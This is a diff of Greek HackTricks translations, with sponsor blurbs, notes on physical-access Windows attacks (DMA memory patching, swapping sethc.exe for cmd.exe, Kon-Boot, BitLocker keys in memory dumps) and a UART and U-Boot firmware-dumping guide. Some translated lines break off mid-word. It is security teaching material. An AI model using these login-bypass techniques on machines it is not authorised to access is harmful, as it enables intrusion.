[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν πληγεί από κλοπή πληροφοριών από κλέφτες.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες malware**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των ληστειών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -143,10 +143,10 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε PDF, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε να χακάρετε το AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα χάκερ σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων με αντάλλαγμα λύτρων που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -48,20 +48,20 @@
|
|||
|
||||
### Επιθέσεις Direct Memory Access (DMA)
|
||||
|
||||
Το **INCEPTION** είναι ένα εργαλείο σχεδιασμένο για τη **φυσική διαχείριση μνήμης** μέσω DMA, συμβατό με διεπαφές όπως **FireWire** και **Thunderbolt**. Επιτρέπει την παράκαμψη των διαδικασιών σύνδεσης εισόδου πατώντας τη μνήμη για να αποδεχτεί οποιονδήποτε κωδικό πρόσβασης. Ωστόσο, δεν είναι αποτελεσματικό ενάντια σε συστήματα **Windows 10**.
|
||||
Το **INCEPTION** είναι ένα εργαλείο σχεδιασμένο για τη **φυσική διαχείριση μνήμης** μέσω DMA, συμβατό με διεπαφές όπως **FireWire** και **Thunderbolt**. Επιτρέπει την παράκαμψη διαδικασιών σύνδεσης με την τροποποίηση της μνήμης για να αποδεχτεί οποιονδήποτε κωδικό πρόσβασης. Ωστόσο, δεν είναι αποτελεσματικό ενάντια σε συστήματα **Windows 10**.
|
||||
|
||||
### Live CD/USB για Πρόσβαση στο Σύστημα
|
||||
|
||||
Η αλλαγή δυαδικών συστήματος όπως το **_sethc.exe_** ή το **_Utilman.exe_** με ένα αντίγραφο του **_cmd.exe_** μπορεί να παρέχει ένα παράθυρο εντολών με δικαιώματα συστήματος. Εργαλεία όπως το **chntpw** μπορούν να χρησιμοποιηθούν για την επεξεργασία του αρχείου **SAM** μιας εγκατάστασης Windows, επιτρέποντας αλλαγές κωδικού πρόσβασης.
|
||||
Η αλλαγή των δυαδικών αρχείων του συστήματος όπως το **_sethc.exe_** ή το **_Utilman.exe_** με ένα αντίγραφο του **_cmd.exe_** μπορεί να παρέχει ένα παράθυρο εντολών με δικαιώματα συστήματος. Εργαλεία όπως το **chntpw** μπορούν να χρησιμοποιηθούν για την επεξεργασία του αρχείου **SAM** μιας εγκατάστασης Windows, επιτρέποντας αλλαγές κωδικού πρόσβασης.
|
||||
|
||||
Το **Kon-Boot** είναι ένα εργαλείο που διευκολύνει τη σύνδεση σε συστήματα Windows χωρίς να γνωρίζετε τον κωδικό πρόσβασης με την προσωρινή τροποποίηση του πυρήνα Windows ή του UEFI. Περισσότερες πληροφορίες μπορούν να βρεθούν στο [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
|
||||
Το **Kon-Boot** είναι ένα εργαλείο που διευκολύνει τη σύνδεση σε συστήματα Windows χωρίς να γνωρίζετε τον κωδικό πρόσβασης με την προσωρινή τροποποίηση του πυρήνα των Windows ή του UEFI. Περισσότερες πληροφορίες μπορούν να βρεθούν στο [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
|
||||
|
||||
### Χειρισμός Χαρακτηριστικών Ασφαλείας Windows
|
||||
|
||||
#### Συντομεύσεις Εκκίνησης και Ανάκτησης
|
||||
|
||||
- **Supr**: Πρόσβαση στις ρυθμίσεις του BIOS.
|
||||
- **F8**: Εισαγωγή στη λειτουργία Ανάκτησης.
|
||||
- **F8**: Είσοδος στη λειτουργία Ανάκτησης.
|
||||
- Πατώντας το **Shift** μετά το banner των Windows μπορεί να παρακάμψει την αυτόματη σύνδεση.
|
||||
|
||||
#### Συσκευές BAD USB
|
||||
|
@ -74,4 +74,4 @@
|
|||
|
||||
### Παράκαμψη Κρυπτογράφησης BitLocker
|
||||
|
||||
Η κρυπτογράφηση BitLocker μπορεί ενδεχομένως να παρακαμφθεί αν ο **κωδικός ανάκτησης** βρεθεί μέσα σε ένα αρχείο ανάκτησης μνήμης (**MEMORY.DMP**). Εργαλεία όπως το **Elcomsoft Forensic Disk Decryptor** ή το **Passware Kit Forensic** μπορούν να χρη
|
||||
Η κρυπτογράφηση BitLocker μπορεί ενδεχομένως να παρακαμφθεί αν ο **κωδικός ανάκτησης** βρεθεί μέσα σε ένα αρχείο ανάκτησης μνήμης (**MEMORY.DMP**). Εργαλεία όπως το **Elcomsoft Forensic Disk Decryptor
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -14,13 +14,13 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -30,9 +30,9 @@
|
|||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το UART είναι ένα σειριακό πρωτόκολλο, που σημαίνει ότι μεταφέρει δεδομένα μεταξύ στοιχείων ένα bit τη φορά. Αντίθετα, τα παράλληλα πρωτόκολλα επικοινωνίας μεταδίδουν δεδομένα ταυτόχρονα μέσω πολλαπλών καναλιών. Συνήθη σειριακά πρωτόκολλα περιλαμβάνουν τα RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express και USB.
|
||||
Το UART είναι ένα σειριακό πρωτόκολλο, που σημαίνει ότι μεταφέρει δεδομένα μεταξύ στοιχείων ένα bit τη φορά. Αντίθετα, τα πρωτόκολλα παράλληλης επικοινωνίας μεταφέρουν δεδομένα ταυτόχρονα μέσω πολλαπλών καναλιών. Συνήθη σειριακά πρωτόκολλα περιλαμβάνουν τα RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express και USB.
|
||||
|
||||
Γενικά, η γραμμή διατηρείται ψηλά (σε λογική τιμή 1) ενώ το UART βρίσκεται σε κατάσταση αδράνειας. Στη συνέχεια, για να σηματοδοτήσει την έναρξη μεταφοράς δεδομένων, ο αποστολέας στέλνει ένα bit εκκίνησης στον παραλήπτη, κατά το οποίο η σήμανση διατηρείται χαμηλά (σε λογική τιμή 0). Στη συνέχεια, ο αποστολέας στέλνει πέντε έως οκτώ bits δεδομένων που περιέχουν το πραγματικό μήνυμα, ακολουθούμενα από ένα προαιρετικό bit ελέγχου περιττότητας και ένα ή δύο bits σταματημένου (με λογική τιμή 1), ανάλογα με τη διαμόρφωση. Το bit περιττότητας, που χρησιμοποιείται για έλεγχο σφαλμάτων, σπάνια βλέπεται στην πράξη. Τα bits σταματημένου (ή bits) σηματοδοτούν το τέλος της μετάδοσης.
|
||||
Γενικά, η γραμμή διατηρείται ψηλά (σε λογική τιμή 1) ενώ το UART βρίσκεται σε κατάσταση αδράνειας. Στη συνέχεια, για να σηματοδοτήσει την έναρξη μεταφοράς δεδομένων, ο αποστολέας στέλνει ένα bit εκκίνησης στον παραλήπτη, κατά το οποίο η σήμανση διατηρείται χαμηλά (σε λογική τιμή 0). Στη συνέχεια, ο αποστολέας στέλνει πέντε έως οκτώ bits δεδομένων που περιέχουν το πραγματικό μήνυμα, ακολουθούμενα από ένα προαιρετικό bit ελέγχου περιττότητας και ένα ή δύο bits σταματημένου (με λογική τιμή 1), ανάλογα με τη διαμόρφωση. Το bit περιττότητας, που χρησιμοποιείται για έλεγχο σφαλμάτων, σπάνια βλέπεται στην πράξη. Το bit σταματημένου (ή τα bits) σηματοδοτούν το τέλος της μετάδοσης.
|
||||
|
||||
Αποκαλούμε την πιο συνηθισμένη διαμόρφωση 8N1: οκτώ bits δεδομένων, χωρίς περιττότητα και ένα bit σταματημένου. Για παράδειγμα, αν θέλαμε να στείλουμε τον χαρακτήρα C, ή 0x43 σε ASCII, σε μια διαμόρφωση UART 8N1, θα στέλναμε τα ακόλουθα bits: 0 (το bit εκκίνησης); 0, 1, 0, 0, 0, 0, 1, 1 (η τιμή του 0x43 σε δυαδική μορφή), και 0 (το bit σταματημένου).
|
||||
|
||||
|
@ -42,7 +42,7 @@
|
|||
|
||||
* Προσαρμογέας USB-to-serial
|
||||
* Προσαρμογείς με τα chips CP2102 ή PL2303
|
||||
* Πολυεργαλείο όπως: Bus Pirate, το Adafruit FT232H, το Shikra, ή το Attify Badge
|
||||
* Πολυεργαλείο όπως το Bus Pirate, το Adafruit FT232H, το Shikra, ή το Attify Badge
|
||||
|
||||
### Αναγνώριση Θυρών UART
|
||||
|
||||
|
@ -50,14 +50,14 @@
|
|||
|
||||
Με ένα **πολύμετρο** και τη συσκευή απενεργοποιημένη:
|
||||
|
||||
* Για να αναγνωρίσετε την **GND** ακίδα χρησιμοποιήστε τη λειτουργία **Συνέχειας Δοκιμής**, τοποθετήστε την πίσω ακίδα στη γη και δοκιμάστε με την κόκκινη μέχρι να ακούσετε ήχο από το πολύμετρο. Μπορεί να βρείτε πολλές ακίδες GND στο PCB, οπότε είτε έχετε βρει είτε όχι αυτή που ανήκει στο UART.
|
||||
* Για να αναγνωρίσετε τη θύρα **VCC**, ορίστε τη λειτουργία **DC τάσης** και ρυθμίστε την σε έως 20 V τάση. Μαύρη στήλη στη γη και κόκκινη στην ακίδα. Ενεργοποιήστε τη συσκευή. Αν το πολύμετρο μετρά μια σταθερή τάση είτε 3,3 V είτε 5 V, έχετε βρει την ακίδα Vcc. Αν λάβετε άλλες τάσεις, δοκιμάστε με άλλες θύρες.
|
||||
* Για να αναγνωρίσετε τη θύρα **TX**, λειτουργία **DC τάσης** έως 20 V τάση, μαύρη στήλη στη γη, κόκκινη στην ακίδα, και ενεργοποιήστε τη συσκευή. Αν βρείτε ότι η τάση διακυμαίνεται για λίγα δευτερόλεπτα και στη συνέχεια σταθεροποιείται στην τιμή της Vcc, πιθανότατα έχετε βρει τη θύρα TX. Αυτό συμβαίνει επειδή κατά την ενεργοποίηση, στέλνει κάποια δεδομένα εντοπισμού.
|
||||
* Για να αναγνωρίσετε την **GND** ακίδα χρησιμοποιήστε τη λειτουργία **Συνέχειας Δοκιμής**, τοποθετήστε το πίσω ακροδέκτη στη γη και δοκιμάστε με τον κόκκινο μέχρι να ακούσετε ήχο από το πολύμετρο. Μπορεί να βρείτε πολλές ακίδες GND στο PCB, οπότε είτε έχετε βρει είτε όχι αυτή που ανήκει στο UART.
|
||||
* Για να αναγνωρίσετε τη θύρα **VCC**, ρυθμίστε τη λειτουργία **DC τάσης** και ρυθμίστε τη σε 20 V τάση. Μαύρος αισθητήρας στη γη και κόκκινος αισθητήρας στην ακίδα. Ενεργοποιήστε τη συσκευή. Αν το πολύμετρο μετρά μια σταθερή τάση είτε 3,3 V είτε 5 V, έχετε βρει την ακίδα Vcc. Αν λάβετε άλλες τάσεις, δοκιμάστε με άλλες θύρες.
|
||||
* Για να αναγνωρίσετε τη θύρα **TX**, **λειτουργία DC τάσης** έως 20 V τάση, μαύρος αισθητήρας στη γη, και κόκκινος αισθητήρας στην ακίδα, και ενεργοποιήστε τη συσκευή. Αν βρείτε ότι η τάση διακυμαίνεται για λίγα δευτερόλεπτα και στη συνέχεια σταθεροποιείται στην τιμή της Vcc, πιθανότατα έχετε βρει τη θύρα TX. Αυτό συμβαίνει επειδή κατά την ενεργοποίηση, στέλνει κάποια δεδομένα εντοπισμού σφαλμάτων.
|
||||
* Η θύρα **RX** θα είναι η πλησιέστερη στις άλλες 3, έχει τη χαμηλότερη διακύμανση τάσης και τη χαμηλότερη συνολική τιμή από όλες τις ακίδες UART.
|
||||
|
||||
Μπορείτε να μπερδέψετε τις θύρες TX και RX και τίποτα δεν θα συμβεί, αλλά αν μπερδέψετε την GND και τη θύρα VCC ενδέχεται να καταστρέψετε το κύκλωμα.
|
||||
Μπορείτε να μπερδέψετε τις θύρες TX και RX και τίποτα δεν θα συμβεί, αλλά αν μπερδέψετε την GND και τη θύρα VCC μπορεί να καταστρέψετε το κύκλωμα.
|
||||
|
||||
Σε ορισμένες συσκευές-στόχους, η θύρα UART είναι απενεργοποιημένη από τον κατασκευαστή με την απενεργοποίηση της RX ή της TX ή και των δύο. Σε αυτήν την περίπτωση, μπορεί να είναι χρήσιμο να ανιχνεύσετε τις συνδέσεις στο πίνακα κυκλωμάτων και να βρείτε κάποιο σημείο διακοπής. Ένα ισχυρό υπόδειγμα για την επιβεβαίωση της μη ανίχνευσης του UART και τη διάλυση του κυκλώματος είναι να ελέγξετε την εγγύηση της συσκευής. Αν η συσκευή έχει αποσταλ
|
||||
Σε ορισμένες συσκευές-στόχους, η θύρα UART είναι απενεργοποιημένη από τον κατασκευαστή με την απενεργοποίηση της RX ή της TX ή ακόμα και και των δύο. Σε αυτήν την περίπτωση, μπορεί να είναι χρήσιμο να εντοπίσετε τις συνδέσεις στο πλακέτα και να βρείτε κάποιο σημείο διακοπής. Ένα ισχυρό υπόδειγμα για την επιβεβαίωση της μη αν
|
||||
```
|
||||
ls /dev/
|
||||
```
|
||||
|
@ -77,13 +77,13 @@ minicom -s
|
|||
|
||||
Σε περίπτωση που οι προσαρμογείς UART Serial σε USB δεν είναι διαθέσιμοι, το Arduino UNO R3 μπορεί να χρησιμοποιηθεί με ένα γρήγορο χάκινγκ. Δεδομένου ότι το Arduino UNO R3 είναι συνήθως διαθέσιμο παντού, αυτό μπορεί να εξοικονομήσει πολύ χρόνο.
|
||||
|
||||
Το Arduino UNO R3 διαθέτει έναν προσαρμογέα USB σε σειριακή θύρα που είναι ενσωματωμένος στην πλακέτα. Για να λάβετε σύνδεση UART, απλώς αποσυνδέστε το μικροελεγκτή Atmel 328p από την πλακέτα. Αυτό το χάκι λειτουργεί σε παραλλαγές του Arduino UNO R3 που δεν έχουν το Atmel 328p κολλημένο στην πλακέτα (χρησιμοποιείται η έκδοση SMD). Συνδέστε τον ακροδέκτη RX του Arduino (Ψηφιακός Ακροδέκτης 0) στον ακροδέκτη TX της διεπαφής UART και τον ακροδέκτη TX του Arduino (Ψηφιακός Ακροδέκτης 1) στον ακροδέκτη RX της διεπαφής UART.
|
||||
Το Arduino UNO R3 διαθέτει έναν προσαρμογέα USB σε σειριακή θύρα που είναι ενσωματωμένος στην πλακέτα. Για να λάβετε σύνδεση UART, απλώς αποσυνδέστε το μικροελεγκτή Atmel 328p από την πλακέτα. Αυτό το χάκι λειτουργεί σε παραλλαγές του Arduino UNO R3 που δεν έχουν το Atmel 328p κολλημένο στην πλακέτα (χρησιμοποιείται η SMD έκδοση). Συνδέστε τον ακροδέκτη RX του Arduino (Ψηφιακός Ακροδέκτης 0) στον ακροδέκτη TX της διεπαφής UART και τον ακροδέκτη TX του Arduino (Ψηφιακός Ακροδέκτης 1) στον ακροδέκτη RX της διεπαφής UART.
|
||||
|
||||
Τέλος, συνιστάται να χρησιμοποιήσετε το Arduino IDE για να αποκτήσετε πρόσβαση στην Σειριακή Κονσόλα. Στην ενότητα `εργαλεία` στο μενού, επιλέξτε την επιλογή `Σειριακή Κονσόλα` και ορίστε το ρυθμό baud όπως απαιτείται από τη διεπαφή UART.
|
||||
Τέλος, συνιστάται να χρησιμοποιήσετε το Arduino IDE για να λάβετε την Σειριακή Κονσόλα. Στην ενότητα `εργαλεία` στο μενού, επιλέξτε την επιλογή `Σειριακή Κονσόλα` και ορίστε το ρυθμό baud σύμφωνα με τη διεπαφή UART.
|
||||
|
||||
## Bus Pirate
|
||||
|
||||
Σε αυτό το σενάριο, θα παρακολουθήσουμε την επικοινωνία UART του Arduino που στέλνει όλες τις εκτυπώσεις του προγράμματος στον Σειριακό Παρακολουθητή.
|
||||
Σε αυτό το σενάριο, θα καταγράψουμε την επικοινωνία UART του Arduino που στέλνει όλες τις εκτυπώσεις του προγράμματος στον Σειριακό Παρακολουθητή.
|
||||
```bash
|
||||
# Check the modes
|
||||
UART>m
|
||||
|
@ -155,23 +155,23 @@ Escritura inicial completada:
|
|||
AAA Hi Dreg! AAA
|
||||
waiting a few secs to repeat....
|
||||
```
|
||||
## Απορρόφηση Firmware με την Κονσόλα UART
|
||||
## Ανάκτηση Firmware με την Κονσόλα UART
|
||||
|
||||
Η Κονσόλα UART παρέχει έναν εξαιρετικό τρόπο για να εργαστείτε με το υποκείμενο firmware σε περιβάλλον εκτέλεσης. Ωστόσο, όταν η πρόσβαση στην Κονσόλα UART είναι μόνο για ανάγνωση, μπορεί να εισάγει πολλούς περιορισμούς. Σε πολλές ενσωματωμένες συσκευές, το firmware αποθηκεύεται σε EEPROMs και εκτελείται σε επεξεργαστές που έχουν αποθηκευτική μνήμη. Επομένως, το firmware παραμένει μόνο για ανάγνωση, αφού το αρχικό firmware κατά την κατασκευή βρίσκεται μέσα στην ίδια την EEPROM και οποιαδήποτε νέα αρχεία θα χαθούν λόγω της αποθηκευτικής μνήμης. Επομένως, η απορρόφηση του firmware είναι μια πολύτιμη προσπάθεια κατά την εργασία με ενσωματωμένα firmware.
|
||||
Η Κονσόλα UART παρέχει έναν εξαιρετικό τρόπο για να εργαστείτε με το υπόκειμενο firmware σε περιβάλλον εκτέλεσης. Ωστόσο, όταν η πρόσβαση στην Κονσόλα UART είναι μόνο για ανάγνωση, μπορεί να εισάγει πολλούς περιορισμούς. Σε πολλές ενσωματωμένες συσκευές, το firmware αποθηκεύεται σε EEPROMs και εκτελείται σε επεξεργαστές που έχουν αποθηκευτική μνήμη. Επομένως, το firmware παραμένει μόνο για ανάγνωση, αφού το αρχικό firmware κατά την κατασκευή βρίσκεται μέσα στην ίδια την EEPROM και οποιαδήποτε νέα αρχεία θα χαθούν λόγω της αποθηκευτικής μνήμης. Επομένως, η ανάκτηση του firmware είναι μια πολύτιμη προσπάθεια κατά την εργασία με ενσωματωμένα firmware.
|
||||
|
||||
Υπάρχουν πολλοί τρόποι για να γίνει αυτό και η ενότητα SPI καλύπτει μεθόδους για την εξαγωγή του firmware απευθείας από την EEPROM με διάφορες συσκευές. Παρόλα αυτά, συνιστάται να δοκιμάσετε πρώτα την απορρόφηση του firmware με την UART, αφού η απορρόφηση του firmware με φυσικές συσκευές και εξωτερικές αλληλεπιδράσεις μπορεί να είναι επικίνδυνη.
|
||||
Υπάρχουν πολλοί τρόποι για να γίνει αυτό και η ενότητα SPI καλύπτει μεθόδους για την εξαγωγή του firmware απευθείας από την EEPROM με διάφορες συσκευές. Ωστόσο, συνιστάται να δοκιμάσετε πρώτα την ανάκτηση του firmware με την Κονσόλα UART, αφού η ανάκτηση του firmware με φυσικές συσκευές και εξωτερικές αλληλεπιδράσεις μπορεί να είναι επικίνδυνη.
|
||||
|
||||
Η απορρόφηση του firmware από την Κονσόλα UART απαιτεί πρώτα την πρόσβαση στους bootloaders. Πολλοί δημοφιλείς προμηθευτές χρησιμοποιούν το <b>uboot</b> (Universal Bootloader) ως τον bootloader τους για τη φόρτωση του Linux. Επομένως, η πρόσβαση στο <b>uboot</b> είναι απαραίτητη.
|
||||
Η ανάκτηση του firmware από την Κονσόλα UART απαιτεί πρώτα την πρόσβαση στους bootloaders. Πολλοί δημοφιλείς προμηθευτές χρησιμοποιούν το <b>uboot</b> (Universal Bootloader) ως τον bootloader τους για τη φόρτωση του Linux. Επομένως, η πρόσβαση στο <b>uboot</b> είναι απαραίτητη.
|
||||
|
||||
Για να έχετε πρόσβαση στον <b>boot</b> bootloader, συνδέστε τη θύρα UART στον υπολογιστή και χρησιμοποιήστε οποιοδήποτε εργαλείο Serial Console και κρατήστε την τροφοδοσία της συσκευής αποσυνδεδεμένη. Μόλις το σύστημα είναι έτοιμο, πατήστε το πλήκτρο Enter και κρατήστε το. Τέλος, συνδέστε την τροφοδοσία της συσκευής και αφήστε τη να εκκινήσει.
|
||||
|
||||
Κάνοντας αυτό, θα διακόψετε το <b>uboot</b> από τη φόρτωση και θα παρέχει ένα μενού. Συνιστάται να κατανοήσετε τις εντολές του <b>uboot</b> και να χρησιμοποιήσετε το μενού βοήθειας για να τις καταχωρίσετε. Αυτό μπορεί να είναι η εντολή `help`. Δεδομένου ότι διαφορετικοί προμηθευτές χρησιμοποιούν διαφορετικές ρυθμίσεις, είναι απαραίτητο να κατανοήσετε καθέναν ξεχωριστά.
|
||||
Κάνοντας αυτό, θα διακόψετε το <b>uboot</b> από το να φορτώσει και θα παρέχει ένα μενού. Συνιστάται να κατανοήσετε τις εντολές του <b>uboot</b> και να χρησιμοποιήσετε το μενού βοήθειας για να τις καταχωρίσετε. Αυτό μπορεί να είναι η εντολή `help`. Δεδομένου ότι διαφορετικοί προμηθευτές χρησιμοποιούν διαφορετικές ρυθμίσεις, είναι απαραίτητο να κατανοήσετε καθέναν ξεχωριστά.
|
||||
|
||||
Συνήθως, η εντολή για την απορρόφηση του firmware είναι:
|
||||
Συνήθως, η εντολή για την ανάκτηση του firmware είναι:
|
||||
```
|
||||
md
|
||||
```
|
||||
Το UART αντιπροσωπεύει το "Universal Asynchronous Receiver/Transmitter", το οποίο αναλαμβάνει να εκτυπώσει τη μνήμη (περιεχόμενο EEPROM) στην οθόνη. Συνιστάται να καταγράψετε την έξοδο της Serial Console πριν ξεκινήσετε τη διαδικασία για να αιχμαλωτίσετε τη μνήμη.
|
||||
Το UART σημαίνει "Universal Asynchronous Receiver/Transmitter". Αυτό θα αδειάσει τη μνήμη (περιεχόμενο EEPROM) στην οθόνη. Συνιστάται να καταγράψετε την έξοδο της Serial Console πριν ξεκινήσετε τη διαδικασία για να καταγράψετε τη μνήμη.
|
||||
|
||||
Τέλος, απλά αφαιρέστε όλα τα περιττά δεδομένα από το αρχείο καταγραφής και αποθηκεύστε το αρχείο ως `filename.rom` και χρησιμοποιήστε το binwalk για να εξάγετε τα περιεχόμενα:
|
||||
```
|
||||
|
@ -179,18 +179,18 @@ binwalk -e <filename.rom>
|
|||
```
|
||||
Αυτό θα εμφανίσει τα πιθανά περιεχόμενα από το EEPROM σύμφωνα με τις υπογραφές που βρέθηκαν στο αρχείο hex.
|
||||
|
||||
